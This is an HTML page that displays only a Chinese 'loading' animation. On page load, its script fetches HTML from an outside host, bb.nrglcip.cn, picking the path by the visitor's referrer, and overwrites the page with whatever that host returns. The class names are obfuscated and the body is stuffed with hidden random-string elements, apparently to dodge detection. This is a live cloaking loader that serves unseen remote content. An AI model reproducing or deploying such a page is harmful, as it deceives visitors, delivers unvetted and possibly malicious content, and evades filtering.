<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QszcsZe1Fvj {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QszcsZe1Fvj .rOevIJr8f9t {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QszcsZe1Fvj .content {
            line-height: 50px;
            text-align: center
        }

        .QszcsZe1Fvj .img {
            width: 100%
        }

        .QszcsZe1Fvj .y8lBZ8 {
            text-align: center
        }

        .QszcsZe1Fvj .y8lBZ8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QszcsZe1Fvj .y8lBZ8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QszcsZe1Fvj .y8lBZ8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QszcsZe1Fvj .y8lBZ8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QszcsZe1Fvj .y8lBZ8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QszcsZe1Fvj .y8lBZ8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QszcsZe1Fvj .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CaZoe3X7ifR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZwWJJz = CaZoe3X7ifR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZwWJJz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZwWJJz +".html?a=share";
		}
		
        Id3Ie02=url+"#"+new Date().getTime();
        Id3Ie02 && function() {
            $.get(Id3Ie02, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>lwr38pclW0AfeTEkjMD51z</span>
<img  src='' style='display:none'>
<p  style='display:none'>UoHlyfAjQ7Sz1fyzPI0KHIsrCTt4a34zV</p><div class="QszcsZe1Fvj">
    <div class="rOevIJr8f9t">
        <div class="y8lBZ8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >llBsywBT3e8JaBNgX2TkFWNm79aUmGx2HAlpqHCQLza2</li>
<li style='display:none' >llBsywBT3e8JaBNgX2TkFWNm79aUmGx2HAlpqHCQLza2</li>
<ul style='display:none' >ZSPXogSCw7pgHXkZr2YYEd5QYX5P80fCA</ul>
<div style='display:none'>weixrvZa72o1bEctzIE1DcUR0WgWjnWifiBiS7VKCBmeQNFWniKFbo3p9KY</div>
<li style='display:none' >llBsywBT3e8JaBNgX2TkFWNm79aUmGx2HAlpqHCQLza2</li>
<div style='display:none'>weixrvZa72o1bEctzIE1DcUR0WgWjnWifiBiS7VKCBmeQNFWniKFbo3p9KY</div>
<p  style='display:none'>lEttp4aAN4S6pRLW249C</p>
<b style='display:none' >BqnHKqzVvQHabOgqFbrnZv</b>
<p  style='display:none'>lEttp4aAN4S6pRLW249C</p></body>
</html>